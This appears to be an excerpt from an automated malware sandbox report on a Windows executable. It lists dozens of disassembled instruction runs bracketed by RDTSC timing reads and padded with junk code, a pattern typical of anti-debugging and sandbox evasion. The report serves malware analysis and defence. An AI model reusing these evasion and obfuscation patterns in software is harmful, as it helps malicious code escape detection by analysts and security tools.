Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54002E3 second address: 5400313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 7651E4EDh 0x00000011 mov esi, 05F4E2E9h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F43C9098CEBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5400313 second address: 5400318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430DF7 second address: 5430DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541027F second address: 5410285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5410285 second address: 54102B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43C9098CF5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54102B6 second address: 54102BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54102BC second address: 54102C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54102C0 second address: 5410303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F43C8AE0089h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F43C8AE007Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5410303 second address: 541034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C9098CF7h 0x00000009 sbb ecx, 1C3A5D0Eh 0x0000000f jmp 00007F43C9098CF9h 0x00000014 popfd 0x00000015 mov ah, BAh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541034B second address: 541034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541034F second address: 5410355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5410355 second address: 541035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541035B second address: 541035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541035F second address: 541039D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C8AE0088h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541039D second address: 54103A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54103A3 second address: 54103B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54103B4 second address: 54103D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F058A second address: 53F058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F058E second address: 53F060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d pushfd 0x0000000e jmp 00007F43C9098CF1h 0x00000013 and al, 00000056h 0x00000016 jmp 00007F43C9098CF1h 0x0000001b popfd 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F43C9098CF3h 0x00000026 pushfd 0x00000027 jmp 00007F43C9098CF8h 0x0000002c jmp 00007F43C9098CF5h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5400ED5 second address: 5400F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F43C8AE0084h 0x00000010 jmp 00007F43C8AE0082h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov ebx, 71E21A1Eh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5400F1A second address: 5400F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, C2F7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C9098CF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5400F42 second address: 5400F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430669 second address: 543066D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543066D second address: 5430671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430671 second address: 5430677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430677 second address: 543067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543067D second address: 54306CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F43C9098CF0h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F43C9098CF3h 0x00000019 and cx, 900Eh 0x0000001e jmp 00007F43C9098CF9h 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54306CE second address: 543071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F43C8AE007Ch 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F43C8AE007Ch 0x00000015 sbb ecx, 3828C9B8h 0x0000001b jmp 00007F43C8AE007Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ecx 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 call 00007F43C8AE007Eh 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543071B second address: 543072E instructions: 0x00000000 rdtsc 0x00000002 mov al, BFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [774365FCh] 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543072E second address: 543073C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test eax, eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543073C second address: 5430740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430740 second address: 5430752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430752 second address: 5430758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430758 second address: 543075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543075C second address: 5430770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F443B01BEE8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430770 second address: 5430774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430774 second address: 543077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543077A second address: 54307DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F43C8AE007Eh 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 mov eax, edx 0x00000019 popad 0x0000001a and ecx, 1Fh 0x0000001d jmp 00007F43C8AE0085h 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F43C8AE0088h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54307DB second address: 54307E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54307E1 second address: 543084E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43C8AE007Eh 0x00000011 xor ax, 5258h 0x00000016 jmp 00007F43C8AE007Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F43C8AE0088h 0x00000022 or ah, FFFFFFB8h 0x00000025 jmp 00007F43C8AE007Bh 0x0000002a popfd 0x0000002b popad 0x0000002c retn 0004h 0x0000002f nop 0x00000030 mov esi, eax 0x00000032 lea eax, dword ptr [ebp-08h] 0x00000035 xor esi, dword ptr [00C42014h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 call 00007F43CD3107F7h 0x00000047 push FFFFFFFEh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov bx, 20A6h 0x00000050 mov cx, bx 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 543084E second address: 54308C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C9098CF6h 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43C9098CF8h 0x00000017 sub ax, B8A8h 0x0000001c jmp 00007F43C9098CEBh 0x00000021 popfd 0x00000022 push eax 0x00000023 mov dx, 6B4Ah 0x00000027 pop edi 0x00000028 popad 0x00000029 ret 0x0000002a nop 0x0000002b push eax 0x0000002c call 00007F43CD8C94C1h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 pushad 0x00000035 mov edi, 2303191Ch 0x0000003a popad 0x0000003b mov si, di 0x0000003e popad 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F43C9098CF3h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54308C6 second address: 54308EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, bh 0x00000011 push ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E00A5 second address: 53E00AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E00AB second address: 53E00AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E00AF second address: 53E0150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F43C9098CEEh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 jmp 00007F43C9098CEEh 0x00000018 mov ax, 2641h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F43C9098CEDh 0x00000025 adc si, 7696h 0x0000002a jmp 00007F43C9098CF1h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F43C9098CF0h 0x00000036 or cx, F6B8h 0x0000003b jmp 00007F43C9098CEBh 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, ebx 0x00000043 jmp 00007F43C9098CF6h 0x00000048 mov ebx, dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0150 second address: 53E0156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0156 second address: 53E0190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F43C9098CF0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C9098CEEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0190 second address: 53E0196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0196 second address: 53E01ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c pushfd 0x0000000d jmp 00007F43C9098CEBh 0x00000012 sub si, 589Eh 0x00000017 jmp 00007F43C9098CF9h 0x0000001c popfd 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F43C9098CF8h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E01ED second address: 53E01FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E01FC second address: 53E0202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0202 second address: 53E024F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F43C8AE007Ch 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F43C8AE007Eh 0x00000018 and si, FF58h 0x0000001d jmp 00007F43C8AE007Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 mov esi, 36AE4EA5h 0x00000029 popad 0x0000002a popad 0x0000002b test esi, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov cx, 56FFh 0x00000034 push eax 0x00000035 pop ebx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E024F second address: 53E02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C9098CF7h 0x00000009 xor esi, 5AABF37Eh 0x0000000f jmp 00007F43C9098CF9h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F443B06706Ch 0x00000020 jmp 00007F43C9098CEAh 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c pushad 0x0000002d mov si, 698Dh 0x00000031 mov di, si 0x00000034 popad 0x00000035 je 00007F443B067062h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E02BB second address: 53E02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E02BF second address: 53E02C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E02C5 second address: 53E0350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C8AE0086h 0x00000009 jmp 00007F43C8AE0085h 0x0000000e popfd 0x0000000f mov ah, DEh 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 mov dx, F27Ch 0x0000001c pushfd 0x0000001d jmp 00007F43C8AE0085h 0x00000022 or ecx, 1E9399D6h 0x00000028 jmp 00007F43C8AE0081h 0x0000002d popfd 0x0000002e popad 0x0000002f or edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F43C8AE007Eh 0x00000037 test edx, 61000000h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 mov eax, 716862D3h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0350 second address: 53E035D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 224C592Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov edx, ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E035D second address: 53E03C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F443AAAE39Ch 0x0000000b pushad 0x0000000c jmp 00007F43C8AE0085h 0x00000011 popad 0x00000012 test byte ptr [esi+48h], 00000001h 0x00000016 jmp 00007F43C8AE007Eh 0x0000001b jne 00007F443AAAE386h 0x00000021 pushad 0x00000022 mov cl, 2Eh 0x00000024 pushad 0x00000025 mov ebx, 02C9C3FCh 0x0000002a jmp 00007F43C8AE0085h 0x0000002f popad 0x00000030 popad 0x00000031 test bl, 00000007h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F43C8AE007Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E03C9 second address: 53E03D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E03D9 second address: 53E03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0768 second address: 53D0785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F43C9098CEDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0785 second address: 53D0789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0789 second address: 53D078F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D078F second address: 53D07E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C8AE0080h 0x00000009 jmp 00007F43C8AE0085h 0x0000000e popfd 0x0000000f jmp 00007F43C8AE0080h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and esp, FFFFFFF8h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43C8AE0087h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D07E8 second address: 53D0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0800 second address: 53D0839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F43C8AE0086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F43C8AE007Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0839 second address: 53D083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D083F second address: 53D0868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F43C8AE0089h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0868 second address: 53D087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D087B second address: 53D0893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0893 second address: 53D08E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F43C9098CEFh 0x00000012 mov ah, 26h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007F43C9098CEBh 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007F43C9098CF6h 0x00000023 sub ebx, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D08E5 second address: 53D08E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
